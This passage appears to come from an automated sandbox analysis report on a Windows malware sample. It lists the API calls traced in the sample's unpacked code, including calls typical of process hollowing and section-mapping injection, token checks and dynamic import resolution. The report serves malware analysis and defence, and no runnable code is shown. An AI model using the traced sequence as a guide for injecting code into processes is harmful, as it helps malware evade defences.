      • Part of subcall function 00409C2E: GetProcessHeap.KERNEL32(?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409D43
      • Part of subcall function 00409C2E: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409D74
      • Part of subcall function 00409C2E: lstrcatW.KERNEL32(?,?), ref: 00409D85
      • Part of subcall function 00409C2E: lstrcatW.KERNEL32(?,00410518), ref: 00409D8D
      • Part of subcall function 00409C2E: lstrcatW.KERNEL32(?,?), ref: 00409D93
      • Part of subcall function 00409C2E: lstrcatW.KERNEL32(?,00410520), ref: 00409D9B
      • Part of subcall function 00409C2E: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409DAA
      • Part of subcall function 00409C2E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 00409DCB
      • Part of subcall function 00409C2E: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409DD4
      • Part of subcall function 00409C2E: HeapFree.KERNEL32(00000000), ref: 00409DDB
      • Part of subcall function 00409C2E: GetThreadContext.KERNEL32(?,00010002), ref: 00409E05
      • Part of subcall function 00409C2E: SetLastError.KERNEL32(00000000), ref: 00409FC9
      • Part of subcall function 00409C2E: ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00409FF4
      • Part of subcall function 00409C2E: IsBadReadPtr.KERNEL32(EpiTo,00000001), ref: 0040A01C
      • Part of subcall function 00409C2E: IsBadReadPtr.KERNEL32(?,00000004), ref: 0040A038
      • Part of subcall function 00409C2E: WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 0040A068
      • Part of subcall function 00409C2E: ResumeThread.KERNELBASE(?), ref: 0040A07E
      • Part of subcall function 00409C2E: CloseHandle.KERNEL32(00000000), ref: 0040A0A2
      • Part of subcall function 00409C2E: TerminateProcess.KERNEL32(?,00000000), ref: 0040A0B5
      • Part of subcall function 00409C2E: CloseHandle.KERNEL32(?), ref: 0040A0BF
      • Part of subcall function 00409C2E: CloseHandle.KERNEL32(?), ref: 0040A0C9
      • Part of subcall function 00409C2E: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A0D6
      • Part of subcall function 00409C2E: HeapFree.KERNEL32(00000000), ref: 0040A0DD
    • ExitProcess.KERNEL32 ref: 0040F1C9
      • Part of subcall function 0040EF8B: VirtualQuery.KERNEL32(0040EF8B,00000000,0000001C,?), ref: 0040EFAB
      • Part of subcall function 00401C80: LoadLibraryA.KERNEL32(?), ref: 00401CC1
      • Part of subcall function 00401C80: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00401CE1
      • Part of subcall function 00401C80: GetModuleHandleExA.KERNEL32(00000001,00000000,?), ref: 00401CF8
    • GetCurrentProcess.KERNEL32 ref: 0040F1F2
      • Part of subcall function 0040E897: OpenProcessToken.ADVAPI32(00000000,00000008,?,00000000,00000000,00000000,?,0040F1FF), ref: 0040E8A6
      • Part of subcall function 0040E897: GetTokenInformation.ADVAPI32(?,00000019,00000000,00000000,?,?,?,0040F1FF), ref: 0040E8C2
      • Part of subcall function 0040E897: GetLastError.KERNEL32(?,0040F1FF), ref: 0040E8D0
      • Part of subcall function 0040E897: GetProcessHeap.KERNEL32(00000008,?,76E6FE8D,?,0040F1FF), ref: 0040E8E1
      • Part of subcall function 0040E897: HeapAlloc.KERNEL32(00000000,?,0040F1FF), ref: 0040E8E8
      • Part of subcall function 0040E897: GetTokenInformation.ADVAPI32(?,00000019,00000000,?,?,?,0040F1FF), ref: 0040E901
      • Part of subcall function 0040E897: GetSidSubAuthorityCount.ADVAPI32(00000000,?,0040F1FF), ref: 0040E90D
      • Part of subcall function 0040E897: GetSidSubAuthority.ADVAPI32(00000000,?,?,0040F1FF), ref: 0040E924
      • Part of subcall function 0040E897: GetProcessHeap.KERNEL32(00000000,00000000,?,0040F1FF), ref: 0040E946
      • Part of subcall function 0040E897: HeapFree.KERNEL32(00000000,?,0040F1FF), ref: 0040E94D
      • Part of subcall function 0040E897: CloseHandle.KERNEL32(?), ref: 0040E957
    • GetVersion.KERNEL32 ref: 0040F201
    • HeapFree.KERNEL32(00000000), ref: 0040F49D
      • Part of subcall function 0040A0EE: GetProcessHeap.KERNEL32(00000008,00000069,?,00000000,76E6FE8D), ref: 0040A1A4
      • Part of subcall function 0040A0EE: HeapAlloc.KERNEL32(00000000), ref: 0040A1A7
      • Part of subcall function 0040A0EE: ReleaseCapture.USER32 ref: 0040A1C2
      • Part of subcall function 0040A0EE: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 0040A1F5
      • Part of subcall function 0040A0EE: GetShortPathNameW.KERNEL32(?,?,00000104), ref: 0040A206
      • Part of subcall function 0040A0EE: GetProcessHeap.KERNEL32(00000008,0000003D), ref: 0040A258
      • Part of subcall function 0040A0EE: HeapAlloc.KERNEL32(00000000), ref: 0040A25B
      • Part of subcall function 0040A0EE: GetForegroundWindow.USER32 ref: 0040A272
      • Part of subcall function 0040A0EE: wsprintfW.USER32 ref: 0040A2A6
      • Part of subcall function 0040A0EE: GetProcessHeap.KERNEL32(00000008,00000019), ref: 0040A2E6
      • Part of subcall function 0040A0EE: HeapAlloc.KERNEL32(00000000), ref: 0040A2E9
      • Part of subcall function 0040A0EE: RevertToSelf.ADVAPI32 ref: 0040A300
      • Part of subcall function 0040A0EE: CoInitializeEx.OLE32(00000000,00000006), ref: 0040A362
      • Part of subcall function 0040A0EE: GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0040A392
      • Part of subcall function 0040A0EE: HeapAlloc.KERNEL32(00000000), ref: 0040A395
      • Part of subcall function 0040A0EE: GetCapture.USER32 ref: 0040A3AC
      • Part of subcall function 0040A0EE: GetProcessHeap.KERNEL32(00000008,00000011), ref: 0040A40B
      • Part of subcall function 0040A0EE: HeapAlloc.KERNEL32(00000000), ref: 0040A40E
      • Part of subcall function 0040A0EE: GetDoubleClickTime.USER32 ref: 0040A422
      • Part of subcall function 0040A0EE: LoadLibraryA.KERNEL32(57495761), ref: 0040A44C
      • Part of subcall function 0040A0EE: GetProcAddress.KERNEL32(00000000), ref: 0040A453
      • Part of subcall function 0040A0EE: GetLastError.KERNEL32 ref: 0040A45D
      • Part of subcall function 0040A0EE: Sleep.KERNEL32(00000064), ref: 0040A46C
      • Part of subcall function 0040A0EE: GetForegroundWindow.USER32 ref: 0040A472
      • Part of subcall function 0040A0EE: CoUninitialize.OLE32 ref: 0040A48B
      • Part of subcall function 0040A0EE: CloseHandle.KERNEL32(?), ref: 0040A494
      • Part of subcall function 0040A0EE: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A4A3
      • Part of subcall function 0040A0EE: HeapFree.KERNEL32(00000000), ref: 0040A4AC
      • Part of subcall function 0040A0EE: GetProcessHeap.KERNEL32(00000000,57495761), ref: 0040A4B2
      • Part of subcall function 0040A0EE: HeapFree.KERNEL32(00000000), ref: 0040A4B5
      • Part of subcall function 0040A0EE: GetProcessHeap.KERNEL32(00000000,4E5A666B), ref: 0040A4BB
      • Part of subcall function 0040A0EE: HeapFree.KERNEL32(00000000), ref: 0040A4BE
      • Part of subcall function 0040A0EE: GetProcessHeap.KERNEL32(00000000,31653832), ref: 0040A4C4
      • Part of subcall function 0040A0EE: HeapFree.KERNEL32(00000000), ref: 0040A4C7
      • Part of subcall function 0040A0EE: GetProcessHeap.KERNEL32(00000000,?), ref: 0040A4CD
      • Part of subcall function 0040A0EE: HeapFree.KERNEL32(00000000), ref: 0040A4D0
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040F214
    • HeapFree.KERNEL32(00000000), ref: 0040F217
    • GetProcessHeap.KERNEL32(00000008,0000009D), ref: 0040F2D1
    • HeapAlloc.KERNEL32(00000000), ref: 0040F2D4
    • GetActiveWindow.USER32 ref: 0040F2EB
    • GetProcessHeap.KERNEL32(00000008,00000051), ref: 0040F374
    • HeapAlloc.KERNEL32(00000000), ref: 0040F377
    • GetModuleHandleW.KERNEL32(00000000), ref: 0040F38D
    • GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040F3BF
    • HeapAlloc.KERNEL32(00000000), ref: 0040F3C2
    • GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040F3D4
    • HeapAlloc.KERNEL32(00000000), ref: 0040F3D7
    • ExpandEnvironmentStringsW.KERNEL32(?,KCBqiNhR7x,00000104), ref: 0040F405
    • ExpandEnvironmentStringsW.KERNEL32(00000000,00000005,00000104), ref: 0040F410
      • Part of subcall function 0040BE1A: GetProcessHeap.KERNEL32(00000008,0000000E,76E645DF,00000000,76E6FE8D), ref: 0040BE64
      • Part of subcall function 0040BE1A: HeapAlloc.KERNEL32(00000000), ref: 0040BE6B
      • Part of subcall function 0040BE1A: GetFocus.USER32 ref: 0040BE7C
      • Part of subcall function 0040BE1A: GetEnvironmentVariableA.KERNEL32(00000000,?,00000104), ref: 0040BEB5
      • Part of subcall function 0040BE1A: lstrlenA.KERNEL32(?), ref: 0040BEC9
      • Part of subcall function 0040BE1A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040BEEA
      • Part of subcall function 0040BE1A: HeapFree.KERNEL32(00000000), ref: 0040BEF1
    • Sleep.KERNEL32(000000FF), ref: 0040F4A1
      • Part of subcall function 0040B8CA: PathFindFileNameW.SHLWAPI(76E645DF,00000000,76E6FE8D,?,?,?,?,?,?,KCBqiNhR7x,0040F429), ref: 0040B8D9
    • StrStrIW.SHLWAPI(7142434B), ref: 0040F44D
    • StrStrIW.SHLWAPI(00000005), ref: 0040F45C
      • Part of subcall function 004019C7: Sleep.KERNEL32(00002710,76AD46E9,76E6FE8D,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 00401A14
      • Part of subcall function 004019C7: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 00401A24
      • Part of subcall function 004019C7: VirtualProtect.KERNEL32(00412000,00000184,00000040,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 00401A85
      • Part of subcall function 004019C7: VirtualProtect.KERNEL32(00412000,00000184,?,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 00401A9F
      • Part of subcall function 004019C7: GlobalAddAtomW.KERNEL32 ref: 00401ABF
      • Part of subcall function 004019C7: AddAtomW.KERNEL32 ref: 00401ACB
      • Part of subcall function 004019C7: GetProcessHeap.KERNEL32(00000000,?,?,?,?,KCBqiNhR7x,0040F467), ref: 00401AFB
      • Part of subcall function 004019C7: HeapFree.KERNEL32(00000000), ref: 00401B02
      • Part of subcall function 0040890F: lstrlenW.KERNEL32(001CFDA8,76AD46E9,7142434B,76E6FE8D), ref: 00408921
      • Part of subcall function 0040890F: GetProcessHeap.KERNEL32(00000008,00000000), ref: 00408941
      • Part of subcall function 0040890F: HeapAlloc.KERNEL32(00000000), ref: 00408944
      • Part of subcall function 0040890F: GetProcessHeap.KERNEL32(00000008,?), ref: 00408963
      • Part of subcall function 0040890F: HeapAlloc.KERNEL32(00000000), ref: 00408966
      • Part of subcall function 0040890F: lstrcpyW.KERNEL32(00000000,?), ref: 0040897B
      • Part of subcall function 0040890F: GetProcessHeap.KERNEL32(00000008,00000021), ref: 004089BB
      • Part of subcall function 0040890F: HeapAlloc.KERNEL32(00000000), ref: 004089BE
      • Part of subcall function 0040890F: GetClipboardOwner.USER32 ref: 004089D2
      • Part of subcall function 0040890F: GetTickCount.KERNEL32(00000005), ref: 004089FE
      • Part of subcall function 0040890F: wsprintfW.USER32 ref: 00408A0F
      • Part of subcall function 0040890F: wsprintfW.USER32 ref: 00408A1F
      • Part of subcall function 0040890F: GetProcessHeap.KERNEL32(00000008,00000104), ref: 00408A33
      • Part of subcall function 0040890F: HeapAlloc.KERNEL32(00000000), ref: 00408A36
      • Part of subcall function 0040890F: GetTickCount.KERNEL32 ref: 00408A47
      • Part of subcall function 0040890F: GetProcessHeap.KERNEL32(00000008,00000044), ref: 00408AE0
      • Part of subcall function 0040890F: HeapAlloc.KERNEL32(00000000), ref: 00408AE3
      • Part of subcall function 0040890F: GetClipboardSequenceNumber.USER32 ref: 00408AF7
      • Part of subcall function 0040890F: wsprintfA.USER32 ref: 00408B2D
      • Part of subcall function 0040890F: GetProcessHeap.KERNEL32(00000000,?), ref: 00408B60
      • Part of subcall function 0040890F: HeapFree.KERNEL32(00000000), ref: 00408B67
      • Part of subcall function 0040890F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408B76
      • Part of subcall function 0040890F: HeapFree.KERNEL32(00000000), ref: 00408B79
      • Part of subcall function 0040890F: GetProcessHeap.KERNEL32(00000000,?), ref: 00408B84
      • Part of subcall function 0040890F: HeapFree.KERNEL32(00000000), ref: 00408B87
      • Part of subcall function 0040890F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408B90
      • Part of subcall function 0040890F: HeapFree.KERNEL32(00000000), ref: 00408B93
      • Part of subcall function 0040890F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408B9F
      • Part of subcall function 0040890F: HeapFree.KERNEL32(00000000), ref: 00408BA2
      • Part of subcall function 0040EE9B: GetProcessHeap.KERNEL32(00000008,00000061,76AD46E9,7142434B,76E6FE8D), ref: 0040EF0F
      • Part of subcall function 0040EE9B: HeapAlloc.KERNEL32(00000000), ref: 0040EF12
      • Part of subcall function 0040EE9B: GetForegroundWindow.USER32 ref: 0040EF23
      • Part of subcall function 0040EE9B: OpenMutexW.KERNEL32(001F0001,00000000,00000000), ref: 0040EF58
      • Part of subcall function 0040EE9B: CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 0040EF6B
      • Part of subcall function 0040EE9B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040EF73
      • Part of subcall function 0040EE9B: HeapFree.KERNEL32(00000000), ref: 0040EF76
      • Part of subcall function 0040EE9B: ExitProcess.KERNEL32 ref: 0040EF84
    • CreateThread.KERNEL32(00000000,00000000,0040C737,00000000,00000000,00000000), ref: 0040F47A
    • CloseHandle.KERNEL32(00000000), ref: 0040F481
    • GetProcessHeap.KERNEL32(00000000,7142434B), ref: 0040F48A
    • HeapFree.KERNEL32(00000000), ref: 0040F493
    • GetProcessHeap.KERNEL32(00000000,00000005), ref: 0040F49A
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • RtlExitUserThread.NTDLL(00000000), ref: 001701D1
    • GetProcAddress.KERNEL32(?,LoadLibraryA,00000000), ref: 001702D6
    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 001702E9
    • LoadLibraryA.KERNEL32(user32.dll), ref: 00170301
    • GetProcAddress.KERNEL32(?,VirtualAlloc), ref: 0017031C
    • GetProcAddress.KERNEL32(?,VirtualProtect), ref: 0017033A
    • GetProcAddress.KERNEL32(?,VirtualFree), ref: 00170358
    • GetProcAddress.KERNEL32(?,ExitThread), ref: 00170376
    • GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 00170394
    • GetProcAddress.KERNEL32(?,RegQueryValueExA), ref: 001703B2
    • GetProcAddress.KERNEL32(?,RegCloseKey), ref: 001703D0
    • GetProcAddress.KERNEL32(?,GetSystemWindowsDirectoryA), ref: 001703EE
    • GetProcAddress.KERNEL32(?,GetVolumeInformationA), ref: 0017040C
    • GetProcAddress.KERNEL32(?,GetUserNameA), ref: 0017042A
    • GetProcAddress.KERNEL32(?,CharUpperBuffA), ref: 00170448
    • GetProcAddress.KERNEL32(?,GetModuleHandleExW), ref: 00170466
    • GetProcAddress.KERNEL32(?,ExitProcess), ref: 00170484
    • GetProcAddress.KERNEL32(?,TerminateProcess), ref: 001704A2
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114485146.00170000.00000040.sdmp, Offset: 00170000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_170000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,00000000), ref: 0040F74E
    • HeapAlloc.KERNEL32(00000000), ref: 0040F751
    • GetClipboardSequenceNumber.USER32 ref: 0040F766
    • GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0040F7B8
    • HeapAlloc.KERNEL32(00000000), ref: 0040F7BB
    • GetShellWindow.USER32 ref: 0040F7CF
    • GetModuleHandleA.KERNEL32(00000000,?), ref: 0040F800
    • GetProcAddress.KERNEL32(00000000), ref: 0040F807
    • NtMapViewOfSection.NTDLL(?,?,4B475735,00000000,00000000,?,00000000,00000002,00000000,00000040), ref: 0040F827
      • Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,00000000), ref: 0040F4DE
      • Part of subcall function 0040F4A9: HeapAlloc.KERNEL32(00000000), ref: 0040F4E1
      • Part of subcall function 0040F4A9: GetShellWindow.USER32 ref: 0040F4FD
      • Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000008,00000017), ref: 0040F55D
      • Part of subcall function 0040F4A9: HeapAlloc.KERNEL32(00000000), ref: 0040F560
      • Part of subcall function 0040F4A9: GetInputState.USER32 ref: 0040F574
      • Part of subcall function 0040F4A9: GetModuleHandleA.KERNEL32(?,00000000), ref: 0040F59E
      • Part of subcall function 0040F4A9: GetProcAddress.KERNEL32(00000000), ref: 0040F5A5
      • Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F5B5
      • Part of subcall function 0040F4A9: HeapFree.KERNEL32(00000000), ref: 0040F5C2
      • Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000000,?), ref: 0040F5C7
      • Part of subcall function 0040F4A9: HeapFree.KERNEL32(00000000), ref: 0040F5CE
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F835
    • HeapFree.KERNEL32(00000000), ref: 0040F842
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040F847
    • HeapFree.KERNEL32(00000000), ref: 0040F84E
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,76E2204D,00000000,?), ref: 0040F9F1
    • HeapAlloc.KERNEL32(00000000), ref: 0040F9F4
    • GetShellWindow.USER32 ref: 0040FA08
    • GetProcessHeap.KERNEL32(00000008,00000011), ref: 0040FA67
    • HeapAlloc.KERNEL32(00000000), ref: 0040FA6A
    • GetCapture.USER32 ref: 0040FA7E
    • GetModuleHandleA.KERNEL32(?,00000000), ref: 0040FAAF
    • GetProcAddress.KERNEL32(00000000), ref: 0040FAB6
    • NtCreateSection.NTDLL(00000000,000F001F,00000018,?,00000040,08000000,00000000), ref: 0040FAEF
    • HeapFree.KERNEL32(00000000), ref: 0040FB6C
      • Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,00000000), ref: 0040F74E
      • Part of subcall function 0040F6F4: HeapAlloc.KERNEL32(00000000), ref: 0040F751
      • Part of subcall function 0040F6F4: GetClipboardSequenceNumber.USER32 ref: 0040F766
      • Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0040F7B8
      • Part of subcall function 0040F6F4: HeapAlloc.KERNEL32(00000000), ref: 0040F7BB
      • Part of subcall function 0040F6F4: GetShellWindow.USER32 ref: 0040F7CF
      • Part of subcall function 0040F6F4: GetModuleHandleA.KERNEL32(00000000,?), ref: 0040F800
      • Part of subcall function 0040F6F4: GetProcAddress.KERNEL32(00000000), ref: 0040F807
      • Part of subcall function 0040F6F4: NtMapViewOfSection.NTDLL(?,?,4B475735,00000000,00000000,?,00000000,00000002,00000000,00000040), ref: 0040F827
      • Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F835
      • Part of subcall function 0040F6F4: HeapFree.KERNEL32(00000000), ref: 0040F842
      • Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000000,?), ref: 0040F847
      • Part of subcall function 0040F6F4: HeapFree.KERNEL32(00000000), ref: 0040F84E
      • Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,00000000), ref: 0040F4DE
      • Part of subcall function 0040F4A9: HeapAlloc.KERNEL32(00000000), ref: 0040F4E1
      • Part of subcall function 0040F4A9: GetShellWindow.USER32 ref: 0040F4FD
      • Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000008,00000017), ref: 0040F55D
      • Part of subcall function 0040F4A9: HeapAlloc.KERNEL32(00000000), ref: 0040F560
      • Part of subcall function 0040F4A9: GetInputState.USER32 ref: 0040F574
      • Part of subcall function 0040F4A9: GetModuleHandleA.KERNEL32(?,00000000), ref: 0040F59E
      • Part of subcall function 0040F4A9: GetProcAddress.KERNEL32(00000000), ref: 0040F5A5
      • Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F5B5
      • Part of subcall function 0040F4A9: HeapFree.KERNEL32(00000000), ref: 0040F5C2
      • Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000000,?), ref: 0040F5C7
      • Part of subcall function 0040F4A9: HeapFree.KERNEL32(00000000), ref: 0040F5CE
    • CloseHandle.KERNEL32(00000000), ref: 0040FB4A
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040FB59
    • HeapFree.KERNEL32(00000000), ref: 0040FB62
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040FB69
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000208,?,00000000,76E6FE8D), ref: 00409C4C
    • HeapAlloc.KERNEL32(00000000), ref: 00409C59
    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409D22
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409D29
    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409D43
    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409D74
    • lstrcatW.KERNEL32(?,?), ref: 00409D85
    • lstrcatW.KERNEL32(?,00410518), ref: 00409D8D
    • lstrcatW.KERNEL32(?,?), ref: 00409D93
    • lstrcatW.KERNEL32(?,00410520), ref: 00409D9B
    • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409DAA
    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 00409DCB
    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409DD4
    • HeapFree.KERNEL32(00000000), ref: 00409DDB
    • GetThreadContext.KERNEL32(?,00010002), ref: 00409E05
    • HeapFree.KERNEL32(00000000), ref: 0040A0DD
      • Part of subcall function 0040F995: GetProcessHeap.KERNEL32(00000008,0000000B,76E2204D,00000000,?), ref: 0040F9F1
      • Part of subcall function 0040F995: HeapAlloc.KERNEL32(00000000), ref: 0040F9F4
      • Part of subcall function 0040F995: GetShellWindow.USER32 ref: 0040FA08
      • Part of subcall function 0040F995: GetProcessHeap.KERNEL32(00000008,00000011), ref: 0040FA67
      • Part of subcall function 0040F995: HeapAlloc.KERNEL32(00000000), ref: 0040FA6A
      • Part of subcall function 0040F995: GetCapture.USER32 ref: 0040FA7E
      • Part of subcall function 0040F995: GetModuleHandleA.KERNEL32(?,00000000), ref: 0040FAAF
      • Part of subcall function 0040F995: GetProcAddress.KERNEL32(00000000), ref: 0040FAB6
      • Part of subcall function 0040F995: NtCreateSection.NTDLL(00000000,000F001F,00000018,?,00000040,08000000,00000000), ref: 0040FAEF
      • Part of subcall function 0040F995: CloseHandle.KERNEL32(00000000), ref: 0040FB4A
      • Part of subcall function 0040F995: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040FB59
      • Part of subcall function 0040F995: HeapFree.KERNEL32(00000000), ref: 0040FB62
      • Part of subcall function 0040F995: GetProcessHeap.KERNEL32(00000000,?), ref: 0040FB69
      • Part of subcall function 0040F995: HeapFree.KERNEL32(00000000), ref: 0040FB6C
    • SetLastError.KERNEL32(00000000), ref: 00409FC9
    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00409FF4
    • IsBadReadPtr.KERNEL32(EpiTo,00000001), ref: 0040A01C
    • IsBadReadPtr.KERNEL32(?,00000004), ref: 0040A038
    • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 0040A068
    • ResumeThread.KERNELBASE(?), ref: 0040A07E
    • CloseHandle.KERNEL32(00000000), ref: 0040A0A2
      • Part of subcall function 0040F859: GetProcessHeap.KERNEL32(00000008,0000000B,76E2204D,00000000,?), ref: 0040F888
      • Part of subcall function 0040F859: HeapAlloc.KERNEL32(00000000), ref: 0040F88F
      • Part of subcall function 0040F859: GetShellWindow.USER32 ref: 0040F8A1
      • Part of subcall function 0040F859: GetProcessHeap.KERNEL32(00000008,00000016), ref: 0040F905
      • Part of subcall function 0040F859: HeapAlloc.KERNEL32(00000000), ref: 0040F90C
      • Part of subcall function 0040F859: CloseClipboard.USER32 ref: 0040F920
      • Part of subcall function 0040F859: LoadLibraryA.KERNEL32(?), ref: 0040F951
      • Part of subcall function 0040F859: GetProcAddress.KERNEL32(00000000), ref: 0040F958
      • Part of subcall function 0040F859: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F971
      • Part of subcall function 0040F859: HeapFree.KERNEL32(00000000), ref: 0040F97E
      • Part of subcall function 0040F859: GetProcessHeap.KERNEL32(00000000,?), ref: 0040F983
      • Part of subcall function 0040F859: HeapFree.KERNEL32(00000000), ref: 0040F98A
      • Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,00000000), ref: 0040F74E
      • Part of subcall function 0040F6F4: HeapAlloc.KERNEL32(00000000), ref: 0040F751
      • Part of subcall function 0040F6F4: GetClipboardSequenceNumber.USER32 ref: 0040F766
      • Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0040F7B8
      • Part of subcall function 0040F6F4: HeapAlloc.KERNEL32(00000000), ref: 0040F7BB
      • Part of subcall function 0040F6F4: GetShellWindow.USER32 ref: 0040F7CF
      • Part of subcall function 0040F6F4: GetModuleHandleA.KERNEL32(00000000,?), ref: 0040F800
      • Part of subcall function 0040F6F4: GetProcAddress.KERNEL32(00000000), ref: 0040F807
      • Part of subcall function 0040F6F4: NtMapViewOfSection.NTDLL(?,?,4B475735,00000000,00000000,?,00000000,00000002,00000000,00000040), ref: 0040F827
      • Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F835
      • Part of subcall function 0040F6F4: HeapFree.KERNEL32(00000000), ref: 0040F842
      • Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000000,?), ref: 0040F847
      • Part of subcall function 0040F6F4: HeapFree.KERNEL32(00000000), ref: 0040F84E
    • TerminateProcess.KERNEL32(?,00000000), ref: 0040A0B5
    • CloseHandle.KERNEL32(?), ref: 0040A0BF
    • CloseHandle.KERNEL32(?), ref: 0040A0C9
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A0D6
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetVersionExA.KERNEL32(?), ref: 0041E26D
    • GetCurrentThread.KERNEL32 ref: 0041E273
    • Sleep.KERNELBASE(00007918), ref: 0041E2B3
    • GetVersionExA.KERNEL32(?), ref: 0041E34E
      • Part of subcall function 0041E070: GetEnvironmentStrings.KERNEL32 ref: 0041E0B5
    • GetCurrentThread.KERNEL32 ref: 0041E41F
    • GetCurrentThread.KERNEL32 ref: 0041E425
      • Part of subcall function 0041DDE0: VirtualAlloc.KERNELBASE(00000000,000009E2,00003000,00000001), ref: 0041DE24
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • GetUserNameA.ADVAPI32(?,00000400), ref: 0017077C
    • CharUpperBuffA.USER32(?,00000400), ref: 00170790
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114485146.00170000.00000040.sdmp, Offset: 00170000, based on PE: false
    Joe Sandbox IDA Plugin
